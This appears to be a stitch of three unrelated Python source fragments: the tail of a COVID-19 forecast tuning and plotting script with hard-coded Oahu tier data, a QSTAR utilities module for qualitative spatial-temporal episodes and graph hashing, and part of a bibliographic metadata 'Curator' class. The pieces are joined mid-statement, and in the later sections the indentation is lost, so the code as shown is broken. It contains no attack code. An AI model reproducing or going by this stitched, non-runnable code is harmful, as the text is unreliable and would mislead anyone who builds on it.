                first_day_forecast = list(expected_14['Reported_New_Cases'])[0]
            if i == 1:
                hospitalization_rate = hospitalization_rate - (hospitalization_rate * 0.01)
                expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
                first_day_forecast = list(expected_14['Hospitalizations'])[0]
            if i == 2:
                hospitalization_ICU_rate = hospitalization_ICU_rate - (hospitalization_ICU_rate * 0.01)
                expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
                first_day_forecast = list(expected_14['ICU'])[0]
            if i == 3:
                ICU_hosp_rate = ICU_hosp_rate - (ICU_hosp_rate * 0.01)
                expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
                first_day_forecast = list(expected_14['Deaths'])[0]
            print(' < 1: ' + str(latest / first_day_forecast))
        elif (latest / first_day_forecast) > 1:
            # Forecast is below the observation: grow the relevant parameter by 1%.
            if i == 0:
                rt_initialization = rt_initialization + (rt_initialization * 0.01)
                expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
                first_day_forecast = list(expected_14['Reported_New_Cases'])[0]
            if i == 1:
                hospitalization_rate = hospitalization_rate + (hospitalization_rate * 0.01)
                expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
                first_day_forecast = list(expected_14['Hospitalizations'])[0]
            if i == 2:
                hospitalization_ICU_rate = hospitalization_ICU_rate + (hospitalization_ICU_rate * 0.01)
                expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
                first_day_forecast = list(expected_14['ICU'])[0]
            if i == 3:
                ICU_hosp_rate = ICU_hosp_rate + (ICU_hosp_rate * 0.01)
                expected_14, pessimistic_14, expected_active, pessimistic_active = loop_through_model()
                first_day_forecast = list(expected_14['Deaths'])[0]
            print(' > 1: ' + str(latest / first_day_forecast))
# Report the tuned parameter values after optimization.
print('Rt_Initialization: ' + str(rt_initialization))
print('Hospital Flow Rate: ' + str(hospitalization_rate))
print('ICU Flow Rate: ' + str(hospitalization_ICU_rate))
print('Death Flow Rate: ' + str(ICU_hosp_rate))
# Set Y axis max: 10% head-room above the combined forecast/historical peak
# (50% for deaths, whose absolute counts are small).
max_hosp = pd.concat([pessimistic_14['Hospitalizations'], hdc_covid_data_df_historical_graph['Hospitalizations']]).astype(int).max() * 1.1
max_ICU = pd.concat([pessimistic_14['ICU'], hdc_covid_data_df_historical_graph['ICU']]).astype(int).max() * 1.1
max_Deaths = pd.concat([pessimistic_14['Deaths'], hdc_covid_data_df_historical_graph['Deaths']]).astype(int).max() * 1.5
max_Reported_New_Cases = pd.concat([pessimistic_14['Reported_New_Cases'], hdc_covid_data_df_historical_graph['Reported_New_Cases']]).astype(int).max() * 1.1
max_Active_Cases = pd.concat([pessimistic_active['Active_Cases'][-15:], active_historical['Active_Cases']]).astype(int).max() * 1.1
# Display forecast graphs (opens the Bokeh output in a browser)
show(forecast_graph(pessimistic_14, expected_14, hdc_covid_data_df_historical_graph, max_hosp, max_ICU, max_Deaths, max_Reported_New_Cases))
#########################################################
######### ~ Create Forecast Graphs (Plotly) ~ ###########
#########################################################
# Change push_to_site to 'Y' if you want the forecasts live, otherwise use 'N' to view in IDE for QA
push_to_site = 'N'
# create_forecast_graphs(cdc_metric, df, df_column, expected_14, pessimistic_14, legend_name, max_metric, chart_studio_name)
create_forecast_graphs('case', hdc_covid_data_df_historical_graph, 'Reported_New_Cases', expected_14, pessimistic_14, 'Cases', max_Reported_New_Cases, 'cases', push_to_site)
create_forecast_graphs('death', hdc_covid_data_df_historical_graph, 'Deaths', expected_14, pessimistic_14, 'Deaths', max_Deaths, 'death', push_to_site)
create_forecast_graphs('active_cases', active_historical, 'Active_Cases', expected_14, pessimistic_14, 'Active Cases', max_Active_Cases, 'active_cases', push_to_site)
create_forecast_graphs('', hdc_covid_data_df_historical_graph, 'Hospitalizations', expected_14, pessimistic_14, 'Hospitalizations', max_hosp, 'hospitalizations', push_to_site)
create_forecast_graphs('', hdc_covid_data_df_historical_graph, 'ICU', expected_14, pessimistic_14, 'ICU', max_ICU, 'ICU', push_to_site)
#########################################################
######## ~ Create Oahu Tier Graph (Plotly) ~ ############
#########################################################
# Hard-coded weekly Oahu reopening-tier metrics (7-day averages) with their
# tier colors; dates are week labels and require manual updates.
# NOTE(review): oahu_test_positivity_rate_color has 28 entries but the other
# three lists have 27 -- verify which color is extraneous before plotting.
oahu_7_day_avg_cases = [93, 73, 68.7, 80, 49, 71, 81, 71, 84, 60, 72, 89, 83, 62, 88, 130, 86, 83, 59, 52, 33, 28, 22, 27, 30, 40, 58]
oahu_7_day_avg_cases_color = ['orange', 'orange', 'orange', 'orange', 'gold', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange','gold', 'gold', 'gold', 'gold', 'gold', 'gold', 'orange']
oahu_test_positivity_rate = [0.04, 0.032, 0.034, 0.023, 0.02, 0.027, 0.031, 0.027, 0.025, 0.021, 0.022, 0.031, 0.028, 0.029, 0.042, 0.040, 0.031, 0.031, 0.024, 0.020, 0.013, 0.011, 0.009, 0.01, 0.01, 0.015, 0.022]
oahu_test_positivity_rate_color = ['orange', 'orange', 'orange', 'gold', 'gold', 'orange', 'orange', 'orange', 'orange', 'gold', 'gold', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'orange', 'gold', 'gold', 'gold', 'gold', 'lightgreen', 'gold', 'gold','gold', 'gold', 'orange']
oahu_dates = ['9/30', '10/7', '10/14', '10/21', '10/28', '11/04', '11/11', '11/18', '11/25', '12/02', '12/09', '12/16', '12/23', '12/30', '1/06', '1/13', '1/20', '1/27', '2/3', '2/10', '2/17', '2/24', '3/3', '3/10', '3/17', '3/24', '3/31']
push_to_site_oahu = 'N'
create_oahu_reopening_graph_plotly(oahu_7_day_avg_cases, oahu_test_positivity_rate, oahu_dates, oahu_7_day_avg_cases_color, oahu_test_positivity_rate_color, | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""QSTAR Utilities
"""
from __future__ import print_function
from itertools import combinations, permutations
import copy, sys
from igraph import Graph as iGraph
import numpy as np
import warnings
import qstag
def compute_episodes(world_qsr):
    """Compute QSR Episodes from a QSRLib.QSR_World_Trace object.

    QSR Episodes compress repeating QSRs into the temporal interval over
    which they hold, e.g.::

        o1,mug,o2,hand,sur,3,7
        o1,mug,o3,head,con,4,9
        o2,hand,o3,head,dis,1,9

    FILTERS: any episode containing a qsr value equal to "Ignore" is dropped.

    ..seealso:: For further details about QSR Episodes, refer to its :doc:`description. <../handwritten/qsrs/qstag/>`

    :param world_qsr: The QSR_World_Trace object (QSRlib_Response_Message)
    :type world_qsr: :class:`World_QSR_Trace <qsrlib_io.world_qsr_trace>`
    :return: episodes with the format
        ``[(objects), {spatial relations}, (start_frame, end_frame)]``
    :rtype: list
    """
    episodes = []
    obj_based_qsr_world = {}
    frames = world_qsr.get_sorted_timestamps()
    # The first frame cannot contain a qtcb relation, so drop it.
    if "qtcbs" in world_qsr.qsr_type:
        if frames[0] == 1.0:
            frames.pop(0)
    # Regroup the per-frame trace into per-object-set lists of (frame, qsrs).
    for frame in frames:
        for objs, qsrs in world_qsr.trace[frame].qsrs.items():
            my_qsrs = {}
            for qsr_key, qsr_val in qsrs.qsr.items():
                # BUG FIX: the original compared with `qsr_key is "tpcc"`; `is`
                # tests object identity and is not reliable for strings.
                if qsr_key == "tpcc":
                    # tpcc is ternary: key the episode on "origin-relatum,datum".
                    origin, relatum, datum = objs.split(',')
                    new_key = "%s-%s,%s" % (origin, relatum, datum)
                    obj_based_qsr_world.setdefault(new_key, []).append(
                        (frame, {"tpcc": qsrs.qsr["tpcc"]}))
                else:
                    my_qsrs[qsr_key] = qsr_val
            if my_qsrs:
                obj_based_qsr_world.setdefault(objs, []).append((frame, my_qsrs))
    # Compress consecutive frames that hold the same relation into one episode.
    for objs, frame_tuples in obj_based_qsr_world.items():
        epi_start, epi_rel = frame_tuples[0]
        epi_end = copy.copy(epi_start)
        objects = objs.split(',')
        for (frame, rel) in frame_tuples:
            if rel == epi_rel:
                epi_end = frame
            else:
                episodes.append((objects, epi_rel, (epi_start, epi_end)))
                epi_start = epi_end = frame
                epi_rel = rel
        episodes.append((objects, epi_rel, (epi_start, epi_end)))
    # Drop every episode where any qsr value equals "Ignore".
    return [ep for ep in episodes
            if not any(val == "Ignore" for val in ep[1].values())]
def get_E_set(objects, spatial_data):
    """Return the starting episode set (E_s) and the ending episode set (E_f).

    See Sridhar AAAI 2010 for more details.

    :param objects: object dictionary with name as key, and node ID as value
    :type objects: dictionary
    :param spatial_data: A list of tuples, where a tuple contains a list of objects, a spatial relation node ID, and a duration of time.
    :type spatial_data: list
    :return: A tuple containing two sets of QSR Episodes, where a temporal node does not hold between Episodes in the same set.
    :rtype: tuple
    """
    objects_ids = objects.values()
    # NOTE(review): `start`/`end` deliberately accumulate across permutations
    # in the original code, so a later E_s/E_f pick can come from an earlier
    # permutation's episode.  Preserved as-is -- confirm intent upstream.
    start, end = {}, {}
    E_s, E_f = [], []
    number_of_objects = len(spatial_data[0][0])
    for possible_ids in permutations(objects_ids, number_of_objects):
        added = False
        for epi in spatial_data:
            ep_objects = epi[0]
            frame_window = epi[2]
            if list(possible_ids) == ep_objects:
                start[frame_window[0]] = epi
                end[frame_window[1]] = epi
                added = True
        if added:
            # BUG FIX: the original called .sort() on dict.keys(), which is a
            # view with no sort() in Python 3; min/max give the same episodes.
            E_s.append(start[min(start)])
            E_f.append(end[max(end)])
    return E_s, E_f
def get_allen_relation(duration1, duration2):
    """Return the Allen interval-algebra relation between two discrete durations.

    Only 'm' (meets), 'mi' (met-by), '<' (before) and '>' (after) are
    distinguished; every other configuration (overlaps, during, starts,
    finishes, equals and their inverses) is collapsed into 'o'.

    :param duration1: First duration of time (start_frame, end_frame)
    :type duration1: tuple
    :param duration2: Second duration of time (start_frame, end_frame)
    :type duration2: tuple
    :return: one of 'm', 'mi', '<', '>', 'o'
    :rtype: str
    """
    start1, end1 = duration1
    start2, end2 = duration2
    if end1 == start2 - 1:
        return 'm'   # duration1 meets duration2
    if end2 == start1 - 1:
        return 'mi'  # duration2 meets duration1
    if start2 > end1:
        return '<'   # duration1 entirely before duration2
    if start1 > end2:
        return '>'   # duration1 entirely after duration2
    return 'o'       # any remaining (overlapping) configuration
def graph_hash(G, node_name_attribute='name', edge_name_attribute=None):
    """Return a hash of an igraph graph based on shortest-path signatures.

    See Figure 4 in 'kLog: A Language for Logical and Relational Learning
    with Kernels' for the algorithm.

    Takes an igraph graph, node_name attribute and edge_name_attribute. Note
    that edge_name_attribute is optional, i.e. for graphs without edge labels
    or to ignore edge labels, edge_name_attribute is None.
    """
    # Suppress RuntimeWarnings about not being able to find a path through
    # the graph.  NOTE(review): filterwarnings('always') below installs a new
    # filter rather than restoring the previous state -- kept as in the
    # original; a warnings.catch_warnings() context would be cleaner.
    warnings.filterwarnings('ignore')
    for node in G.vs:
        paths = G.get_shortest_paths(node)
        node_hashes = []
        for path in paths:
            if len(path) != 0:
                node_name = G.vs[path[-1]][node_name_attribute]
                # BUG FIX: compare against None with `is`, not `==`.
                if node_name is None:
                    node_name = repr(None)
                # Signature element: (distance to the node, its name).
                node_hashes.append((len(path), node_name))
        node_hashes.sort()
        node_hashes_string = ':'.join([repr(i) for i in node_hashes])
        node['hash_name'] = hash(node_hashes_string)
    warnings.filterwarnings('always')
    # Combine the per-node hashes over every edge (optionally labelled).
    if edge_name_attribute:
        edge_hashes = [(G.vs[edge.source]['hash_name'], G.vs[edge.target]['hash_name'],
                        edge[edge_name_attribute]) for edge in G.es]
    else:
        edge_hashes = [(G.vs[edge.source]['hash_name'], G.vs[edge.target]['hash_name'])
                       for edge in G.es]
    edge_hashes.sort()
    edge_hashes_string = ':'.join([repr(i) for i in edge_hashes])
    return hash(edge_hashes_string)
def get_temporal_chords_from_episodes(episodes):
    """Return temporal chords from a subset of episodes.

    A chord is a maximal interval over which the set of active episode ids
    does not change.

    :param episodes: a list of episodes, where one episode has the format (start_frame, end_frame, id)
    :type episodes: list
    :return: list of chords, each ``[start, end, [active ids]]``
    :rtype: list

    NOTE(review): an empty *episodes* list raises IndexError (as in the
    original); frames are truncated to ints, so float timestamps only work
    with a whole-number unit.
    """
    interval_data = {}
    interval_breaks = []
    # For each time point in the combined interval, record the system state:
    # the list of episode ids active at that time point.
    for (s, e, id_) in episodes:
        for i in range(int(s), int(e + 1)):
            interval_data.setdefault(i, []).append(id_)
    # BUG FIX: the original called .sort() on dict.keys(), which is a view
    # with no sort() in Python 3; build a sorted list instead.
    keys = sorted(interval_data)
    # Break the combined interval wherever the active-id state changes.
    start = keys[0]
    interval_value = interval_data[start]
    for i in keys:
        if interval_value == interval_data[i]:
            end = i
            continue
        else:
            interval_breaks.append([start, end, interval_value])
            start = i
            end = i
            interval_value = interval_data[start]
    else:
        # Loop completed without break: flush the final interval.
        interval_breaks.append([start, end, interval_value])
    return interval_breaks
# -------------------------- MY CODE - MY FUNCTIONS -------------------------- #
def color_temporal_nodes(graph, dot_file):
# TKinter Color Chart: http://www.science.smith.edu/dftwiki/index.php/Color_Charts_for_TKinter
COLORS = ['snow', 'ghostwhite', 'whitesmoke', 'gainsboro', 'floralwhite',
'oldlace', 'linen', 'antiquewhite', 'papayawhip', 'blanchedalmond', 'bisque',
'peachpuff', 'navajowhite', 'lemonchiffon', 'mintream', 'azure', 'aliceblue',
'lavender', 'lavenderblush', 'mistyrose', 'darkslategray', 'dimgray', 'slategray',
'lightslategray', 'gray', 'lightgrey', 'midnightblue', 'navy', 'cornflowerblue',
'darkslateblue', 'slateblue', 'mediumslateblue', 'lightslateblue', 'mediumblue',
'royalblue', 'blue', 'dodgerblue', 'deepskyblue', 'skyblue', 'lightskyblue',
'steelblue', 'lightsteelblue', 'lightblue', 'powderblue', 'paleturquoise',
'darkturquoise', 'mediumturquoise', 'turquoise', 'cyan', 'lightcyan', 'cadetblue',
'mediumaquamarine', 'aquamarine', 'darkgreen', 'darkolive green', 'darkseagreen',
'seagreen', 'mediumseagreen', 'lightseagreen', 'palegreen', 'springgreen',
'lawngreen', 'mediumspringgreen', 'greenyellow', 'limegreen', 'yellowgreen',
'forestgreen', 'olivedrab', 'darkkhaki', 'khaki', 'palegoldenrod', 'lightgoldenrodyellow',
'lightyellow', 'yellow', 'gold', 'lightgoldenrod', 'goldenrod', 'darkgoldenrod',
'rosybrown', 'indianred', 'saddlebrown', 'sandybrown', 'darksalmon', 'salmon',
'lightsalmon', 'orange', 'darkorange', 'coral', 'lightcoral', 'tomato',
'orangered', 'red', 'hotpink', 'deeppink', 'pink', 'lightpink', 'palevioletred',
'maroon', 'mediumvioletred', 'violetred', 'mediumorchid', 'darkorchid',
'darkviolet', 'blueviolet', 'purple', 'mediumpurple', 'thistle', 'snow2',
'snow3', 'snow4', 'seashell2', 'seashell3', 'seashell4', 'AntiqueWhite1',
'AntiqueWhite2', 'AntiqueWhite3', 'AntiqueWhite4', 'bisque2', 'bisque3',
'bisque4', 'PeachPuff2', 'PeachPuff3', 'PeachPuff4', 'NavajoWhite2', 'NavajoWhite3',
'NavajoWhite4', 'LemonChiffon2', 'LemonChiffon3', 'LemonChiffon4', 'cornsilk2',
'cornsilk3', 'cornsilk4', 'ivory2', 'ivory3', 'ivory4', 'honeydew2', 'honeydew3',
'honeydew4', 'LavenderBlush2', 'LavenderBlush3', 'LavenderBlush4', 'MistyRose2',
'MistyRose3', 'MistyRose4', 'azure2', 'azure3', 'azure4', 'SlateBlue1',
'SlateBlue2', 'SlateBlue3', 'SlateBlue4', 'RoyalBlue1', 'RoyalBlue2', 'RoyalBlue3',
'RoyalBlue4', 'blue2', 'blue4', 'DodgerBlue2', 'DodgerBlue3', 'DodgerBlue4',
'SteelBlue1', 'SteelBlue2', 'SteelBlue3', 'SteelBlue4', 'DeepSkyBlue2',
'DeepSkyBlue3', 'DeepSkyBlue4', 'SkyBlue1', 'SkyBlue2', 'SkyBlue3', 'SkyBlue4',
'LightSkyBlue1', 'LightSkyBlue2', 'LightSkyBlue3', 'LightSkyBlue4', 'SlateGray1',
'SlateGray2', 'SlateGray3', 'SlateGray4', 'LightSteelBlue1', 'LightSteelBlue2',
'LightSteelBlue3', 'LightSteelBlue4', 'LightBlue1', 'LightBlue2', 'LightBlue3',
'LightBlue4', 'LightCyan2', 'LightCyan3', 'LightCyan4', 'PaleTurquoise1',
'PaleTurquoise2', 'PaleTurquoise3', 'PaleTurquoise4', 'CadetBlue1', 'CadetBlue2',
'CadetBlue3', 'CadetBlue4', 'turquoise1', 'turquoise2', 'turquoise3', 'turquoise4',
'cyan2', 'cyan3', 'cyan4', 'DarkSlateGray1', 'DarkSlateGray2', 'DarkSlateGray3',
'DarkSlateGray4', 'aquamarine2', 'aquamarine4', 'DarkSeaGreen1', 'DarkSeaGreen2',
'DarkSeaGreen3', 'DarkSeaGreen4', 'SeaGreen1', 'SeaGreen2', 'SeaGreen3',
'PaleGreen1', 'PaleGreen2', 'PaleGreen3', 'PaleGreen4', 'SpringGreen2',
'SpringGreen3', 'SpringGreen4', 'green2', 'green3', 'green4', 'chartreuse2',
'chartreuse3', 'chartreuse4', 'OliveDrab1', 'OliveDrab2', 'OliveDrab4',
'DarkOliveGreen1', 'DarkOliveGreen2', 'DarkOliveGreen3', 'DarkOliveGreen4',
'khaki1', 'khaki2', 'khaki3', 'khaki4', 'LightGoldenrod1', 'LightGoldenrod2',
'LightGoldenrod3', 'LightGoldenrod4', 'LightYellow2', 'LightYellow3', 'LightYellow4',
'yellow2', 'yellow3', 'yellow4', 'gold2', 'gold3', 'gold4', 'goldenrod1',
'goldenrod2', 'goldenrod3', 'goldenrod4', 'DarkGoldenrod1', 'DarkGoldenrod2',
'DarkGoldenrod3', 'DarkGoldenrod4', 'RosyBrown1', 'RosyBrown2', 'RosyBrown3',
'RosyBrown4', 'IndianRed1', 'IndianRed2', 'IndianRed3', 'IndianRed4', 'sienna1',
'sienna2', 'sienna3', 'sienna4', 'burlywood1', 'burlywood2', 'burlywood3',
'burlywood4', 'wheat1', 'wheat2', 'wheat3', 'wheat4', 'tan1', 'tan2', 'tan4',
'chocolate1', 'chocolate2', 'chocolate3', 'firebrick1', 'firebrick2', 'firebrick3',
'firebrick4', 'brown1', 'brown2', 'brown3', 'brown4', 'salmon1', 'salmon2',
'salmon3', 'salmon4', 'LightSalmon2', 'LightSalmon3', 'LightSalmon4', 'orange2',
'orange3', 'orange4', 'DarkOrange1', 'DarkOrange2', 'DarkOrange3', 'DarkOrange4',
'coral1', 'coral2', 'coral3', 'coral4', 'tomato2', 'tomato3', 'tomato4', 'OrangeRed2',
'OrangeRed3', 'OrangeRed4', 'red2', 'red3', 'red4', 'DeepPink2', 'DeepPink3',
'DeepPink4', 'HotPink1', 'HotPink2', 'HotPink3', 'HotPink4', 'pink1', 'pink2',
'pink3', 'pink4', 'LightPink1', 'LightPink2', 'LightPink3', 'LightPink4',
'PaleVioletRed1', 'PaleVioletRed2', 'PaleVioletRed3', 'PaleVioletRed4',
'maroon1', 'maroon2', 'maroon3', 'maroon4', 'VioletRed1', 'VioletRed2',
'VioletRed3', 'VioletRed4', 'magenta2', 'magenta3', 'magenta4', 'orchid1',
'orchid2', 'orchid3', 'orchid4', 'plum1', 'plum2', 'plum3', 'plum4', 'MediumOrchid1',
'MediumOrchid2', 'MediumOrchid3', 'MediumOrchid4', 'DarkOrchid1', 'DarkOrchid2',
'DarkOrchid3', 'DarkOrchid4', 'purple1', 'purple2', 'purple3', 'purple4',
'MediumPurple1', 'MediumPurple2', 'MediumPurple3', 'MediumPurple4', 'thistle1',
'thistle2', 'thistle3', 'thistle4', 'gray1', 'gray2', 'gray3', 'gray4', 'gray5',
'gray6', 'gray7', 'gray8', 'gray9', 'gray10', 'gray11', 'gray12', 'gray13',
'gray14', 'gray15', 'gray16', 'gray17', 'gray18', 'gray19', 'gray20', 'gray21',
'gray22', 'gray23', 'gray24', 'gray25', 'gray26', 'gray27', 'gray28', 'gray29',
'gray30', 'gray31', 'gray32', 'gray33', 'gray34', 'gray35', 'gray36', 'gray37',
'gray38', 'gray39', 'gray40', 'gray42', 'gray43', 'gray44', 'gray45', 'gray46',
'gray47', 'gray48', 'gray49', 'gray50', 'gray51', 'gray52', 'gray53', 'gray54',
'gray55', 'gray56', 'gray57', 'gray58', 'gray59', 'gray60', 'gray61', 'gray62',
'gray63', 'gray64', 'gray65', 'gray66', 'gray67', 'gray68', 'gray69', 'gray70',
'gray71', 'gray72', 'gray73', 'gray74', 'gray75', 'gray76', 'gray77', 'gray78',
'gray79', 'gray80', 'gray81', 'gray82', 'gray83', 'gray84', 'gray85', 'gray86',
'gray87', 'gray88', 'gray89', 'gray90', 'gray91', 'gray92', 'gray93', 'gray94',
'gray95', 'gray97', 'gray98', 'gray99']
# Find unique temporal relations.
temp_list = []
for o in graph.temporal_nodes:
temp_list.append(o['name'])
unique_temporal,unique_temp_counts = np.unique(temp_list, return_counts = True)
# Manager the color distribution depending on the unique temporal relations captured.
color = 40
which_color = []
for i in range(len(unique_temporal)):
which_color.append(COLORS[color])
color += 4
# Assign color to | |
"br/"
else:
pattern = "ra/"
metaid = ""
id_list = list(filter(None, id_list))
how_many_meta = [i for i in id_list if i.lower().startswith('meta')]
if len(how_many_meta) > 1:
for pos, elem in enumerate(id_list):
if "meta" in elem:
id_list[pos] = ""
else:
for pos, elem in enumerate(id_list):
try:
elem = Curator.string_fix(elem)
identifier = elem.split(":", 1)
value = identifier[1]
schema = identifier[0].lower()
if schema == "meta":
if "meta:" + pattern in elem:
metaid = value.replace(pattern, "")
else:
id_list[pos] = ""
else:
newid = schema + ":" + value
id_list[pos] = newid
except IndexError:
id_list[pos] = ""
if metaid:
id_list.remove("meta:" + pattern + metaid)
id_list = list(filter(None, id_list))
return id_list, metaid
def conflict(self, idslist, name, id_dict, col_name):
    """Register *name*/*idslist* as a conflict entity and return its metaval.

    Bibliographic columns ("id", "venue") are stored in ``self.conflict_br``;
    responsible-agent columns ("author", "editor", "publisher") in
    ``self.conflict_ra``.  Every identifier is appended to the entity's ids
    and, when unseen, resolved through the triplestore or given a freshly
    numbered local id.
    """
    if col_name == "id" or col_name == "venue":
        entity_dict = self.conflict_br
        metaval = self.new_entity(entity_dict, name)
    elif col_name in ("author", "editor", "publisher"):
        entity_dict = self.conflict_ra
        metaval = self.new_entity(entity_dict, name)
    self.log[self.rowcnt][col_name]['Conflict Entity'] = metaval
    for identifier in idslist:
        entity_dict[metaval]["ids"].append(identifier)
        if identifier in id_dict:
            continue
        parts = identifier.split(":")
        found_m = self.finder.retrieve_id(parts[0], parts[1])
        if found_m:
            id_dict[identifier] = found_m
        else:
            fresh = self._add_number(self.id_info_path)
            id_dict[identifier] = self.prefix + str(fresh)
    return metaval
def finder_sparql(self, list2find, br=True, ra=False, vvi=False, publ=False):
    """Look up identifiers in the triplestore, stopping after two distinct hits.

    :param list2find: identifiers in "schema:value" form
    :param br: query bibliographic resources
    :param ra: query responsible agents (*publ* is forwarded to the finder)
    :param vvi: unused here; kept for interface compatibility
    :return: list of at most the first result tuples with distinct first elements
    :rtype: list
    """
    matches = list()
    seen_ids = set()
    res = None
    for elem in list2find:
        # Stop querying once two distinct entities have been found.
        if len(matches) >= 2:
            continue
        parts = elem.split(":")
        schema, value = parts[0], parts[1]
        if br:
            res = self.finder.retrieve_br_from_id(value, schema)
        elif ra:
            res = self.finder.retrieve_ra_from_id(value, schema, publ)
        if res:
            for row in res:
                if row[0] not in seen_ids:
                    matches.append(row)
                    seen_ids.add(row[0])
    return matches
def ra_update(self, row, br_key, col_name):
    """Rewrite row[col_name] as '; '-joined 'Name [ids]' strings.

    Uses the (index, agent-id) sequence stored in
    ``self.armeta[br_key][col_name]`` and the agent records in
    ``self.rameta``; an empty/falsy cell is left untouched.
    """
    if not row[col_name]:
        return
    formatted = []
    for _, agent_id in self.armeta[br_key][col_name]:
        record = self.rameta[agent_id]
        formatted.append("%s [%s]" % (record["title"], " ".join(record["ids"])))
    row[col_name] = "; ".join(formatted)
@staticmethod
def local_match(list2match, dict2match):
match_elem = dict()
match_elem["existing"] = list()
match_elem["wannabe"] = list()
for elem in list2match:
for k, va in dict2match.items():
if elem in va["ids"]:
if "wannabe" in k:
if k not in match_elem["wannabe"]:
match_elem["wannabe"].append(k)
else:
if k not in match_elem["existing"]:
match_elem["existing"].append(k)
return match_elem
def meta_ar(self, newkey, oldkey, role):
    """Copy the (index, agent) sequence for *role* from ardict[oldkey]
    into armeta[newkey], translating temporary 'wannabe' agent keys to
    their final Meta IDs via self.rameta."""
    for idx, agent in self.ardict[oldkey][role]:
        if "wannabe" in agent:
            # Resolve the temporary key through the agent's 'others' list.
            for meta_id in self.rameta:
                if agent in self.rameta[meta_id]['others']:
                    resolved = meta_id
                    break
        else:
            resolved = agent
        self.armeta[newkey][role].append((idx, resolved))
def meta_maker(self):
for x in self.brdict:
if "wannabe" in x:
other = x
count = self._add_number(self.br_info_path)
meta = self.prefix + str(count)
self.brmeta[meta] = self.brdict[x]
self.brmeta[meta]["others"].append(other)
self.brmeta[meta]["ids"].append("meta:br/" + meta)
else:
self.brmeta[x] = self.brdict[x]
self.brmeta[x]["ids"].append("meta:br/" + x)
for x in self.radict:
if "wannabe" in x:
other = x
count = self._add_number(self.ra_info_path)
meta = self.prefix + str(count)
self.rameta[meta] = self.radict[x]
self.rameta[meta]["others"].append(other)
self.rameta[meta]["ids"].append("meta:ra/" + meta)
else:
self.rameta[x] = self.radict[x]
self.rameta[x]["ids"].append("meta:ra/" + x)
for x in self.ardict:
if "wannabe" in x:
for w in self.brmeta:
if x in self.brmeta[w]["others"]:
br_key = w
break
else:
br_key = x
self.armeta[br_key] = dict()
self.armeta[br_key]["author"] = list()
self.armeta[br_key]["editor"] = list()
self.armeta[br_key]["publisher"] = list()
self.meta_ar(br_key, x, "author")
self.meta_ar(br_key, x, "editor")
self.meta_ar(br_key, x, "publisher")
def enrich(self):
for row in self.data:
if "wannabe" in row["id"]:
for i in self.brmeta:
if row["id"] in self.brmeta[i]["others"]:
k = i
else:
k = row["id"]
if row["page"] and (k not in self.remeta):
re_meta = self.finder.re_from_meta(k)
if re_meta:
self.remeta[k] = re_meta
row["page"] = re_meta[1]
else:
count = self.prefix + str(self._add_number(self.re_info_path))
page = row["page"].strip().replace("\0", "")
self.remeta[k] = (count, page)
row["page"] = page
elif k in self.remeta:
row["page"] = self.remeta[k][1]
self.ra_update(row, k, "author")
self.ra_update(row, k, "publisher")
self.ra_update(row, k, "editor")
row["id"] = " ".join(self.brmeta[k]["ids"])
row["title"] = self.brmeta[k]["title"]
if row["venue"]:
venue = row["venue"]
if "wannabe" in venue:
for i in self.brmeta:
if venue in self.brmeta[i]["others"]:
ve = i
else:
ve = venue
row["venue"] = self.brmeta[ve]["title"] + " [" + " ".join(self.brmeta[ve]["ids"]) + "]"
@staticmethod
def name_check(ts_name, name):
if "," in ts_name:
names = ts_name.split(",")
if names[0] and not names[1].strip():
# there isn't a given name in ts
if "," in name:
gname = name.split(", ")[1]
if gname.strip():
ts_name = names[0] + ", " + gname
return ts_name
@staticmethod
def clean_name(name):
name = name.replace("\0", "")
if "," in name:
split_name = re.split(r'\s*,\s*', name)
first_name = split_name[1].split()
for pos, w in enumerate(first_name):
first_name[pos] = w.title()
new_first_name = " ".join(first_name)
surname = split_name[0].split()
for pos, w in enumerate(surname):
surname[pos] = w.title()
new_surname = " ".join(surname)
if new_surname:
new_name = new_surname + ", " + new_first_name
else:
new_name = ""
else:
split_name = name.split()
for pos, w in enumerate(split_name):
split_name[pos] = w.capitalize()
new_name = " ".join(split_name)
return new_name
@staticmethod
def clean_title(title):
title = title.replace("\0", "")
if title.isupper():
title = title.lower()
words = title.split()
for pos, w in enumerate(words):
if any(x.isupper() for x in w):
pass
else:
words[pos] = w.title()
newtitle = " ".join(words)
return newtitle
@staticmethod
def _read_number(file_path, line_number=1):
cur_number = 0
try:
with open(file_path) as f:
cur_number = int(f.readlines()[line_number - 1])
except (ValueError, IOError, IndexError):
pass # Do nothing
return cur_number
@staticmethod
def _add_number(file_path, line_number=1):
cur_number = Curator._read_number(file_path, line_number) + 1
if not os.path.exists(os.path.dirname(file_path)):
os.makedirs(os.path.dirname(file_path))
if os.path.exists(file_path):
with open(file_path) as f:
all_lines = f.readlines()
else:
all_lines = []
line_len = len(all_lines)
zero_line_number = line_number - 1
for i in range(line_number):
if i >= line_len:
all_lines += ["\n"]
if i == zero_line_number:
all_lines[i] = str(cur_number) + "\n"
with open(file_path, "w") as f:
f.writelines(all_lines)
return cur_number
@staticmethod
def write_csv(path, datalist):
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
with open(path, 'w', newline='', encoding="utf-8") as output_file:
dict_writer = csv.DictWriter(output_file, datalist[0].keys(), delimiter=',', quotechar='"',
quoting=csv.QUOTE_NONNUMERIC)
dict_writer.writeheader()
dict_writer.writerows(datalist)
def indexer(self, path_index, path_csv):
# ID
self.index_id_ra = list()
if self.idra:
for x in self.idra:
row = dict()
row["id"] = str(x)
row["meta"] = str(self.idra[x])
self.index_id_ra.append(row)
else:
row = dict()
row["id"] = ""
row["meta"] = ""
self.index_id_ra.append(row)
self.index_id_br = list()
if self.idbr:
for x in self.idbr:
row = dict()
row["id"] = str(x)
row["meta"] = str(self.idbr[x])
self.index_id_br.append(row)
else:
row = dict()
row["id"] = ""
row["meta"] = ""
self.index_id_br.append(row)
# AR
self.ar_index = list()
if self.armeta:
for x in self.armeta:
index = dict()
index["meta"] = x
for y in self.armeta[x]:
list_ar = list()
for ar, identifier in self.armeta[x][y]:
list_ar.append(str(ar) + ", " + str(identifier))
